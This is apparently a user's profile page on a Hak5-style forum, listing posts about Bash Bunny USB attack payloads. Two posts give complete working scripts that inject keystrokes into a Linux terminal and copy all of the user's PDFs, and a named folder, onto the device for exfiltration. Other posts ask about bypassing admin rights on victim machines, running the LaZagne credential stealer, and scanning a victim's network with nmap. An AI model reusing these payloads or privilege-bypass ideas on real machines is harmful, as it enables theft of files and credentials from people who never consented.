Jump to content

Am3ience

Active Members
  • Posts

    30
  • Joined

  • Last visited

  • Days Won

    1

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Am3ience's Achievements

Newbie

Newbie (1/14)

  1. Hey guys, Just made a simple file grabber for Linux, was built for Fedora distro, but is easily changed for other distros. #!/bin/bash # # Title: Linux Grabber # Author: am3ience # Version: 1.0 # # grabs specified files and folders on the user's directory and copies them to the bunny loot folder # # LED SETUP ATTACKMODE HID STORAGE LED ATTACK RUN UNITY gnome-terminal Q DELAY 1000 Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber #export loot directory Q ENTER Q STRING mkdir -p \$lootdir #make loot directory Q ENTER # Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage. Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\; Q ENTER Q DELAY 1000 # Find the 'testing' folder to copy Q STRING find . -type d -name 'testing' -exec cp -a '{}' \$lootdir \\\; Q ENTER Q DELAY 1000 Q STRING exit Q ENTER # sync the filesystem sync LED FINISH
  2. Hey guys! So after mucking about with the payloads these past few months, I've noticed most of them work assuming you have root privileges on the machine you're plugged into. How do you guys bypass that when the user on the computer you're plugged into is just a basic user? Are there any viable way on Linux and Windows to bypass admin rights? Or do we just assume we get into the root/admin when administering payloads? Thanks guys :)
  3. follow up question, is there anyway to SSH into the bunny to where the payloads are located? I can SSH, but i'm having a hard time finding where the payloads are stored. I was thinking of just chmod +x the LaZagne file while SSH in to see if that would fix it.
  4. I'm trying to run LaZagne (Linux) on the bash bunny for a Linux payload. LaZagne works by itself when I run it on my Linux system, but once I copy it into the bunny under payloads, it says permission denied. I went to properties and tried to tick the "allow the execution of this file" tick box, but it just unticks itself right away. I tried "chmod +x" it changed it for a brief second then reverts back to un-executable. Anyone else run into similar issues? EDIT: I'm not having issues running windows .exe, just Linux binary files it seems
  5. Thanks guys! Managed to figure it out with your help. For future reference if anyone else stumbles upon this thread, below is the code to exfil PDFs from Fedora, but should work in all Linux distros. LED SETUP ATTACKMODE HID STORAGE LED ATTACK RUN UNITY xterm Q DELAY 1000 Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber Q ENTER Q STRING mkdir -p \$lootdir Q ENTER # Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage. Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\; Q ENTER Q STRING killall xterm Q ENTER # sync the filesystem sync LED FINISH
  6. I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil What kind of things would i need to change for this to work for Linux?
  7. Hey guys, So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on linux to the Bash Bunny. Any help would be great, thanks!
  8. This would require you know the ip you want to scan beforehand, correct?
  9. oh ok, so just place the nmap package on the usb, and then put it on the victim's pc then scan?
  10. so nmap needs to be installed on the victim computer? if one would want to scan another network adapter
  11. so the BB doesn't actually get the target's IP? It leases its IP " 172.16.64.10 " to target?
  12. I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.
  13. does this work for linux as well? Or only Windows?
  14. been having the same issue, running this payload according to the readme bricked my bash bunny. Anyone else got this working with the latest firmware?
  15. isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe
×
×
  • Create New...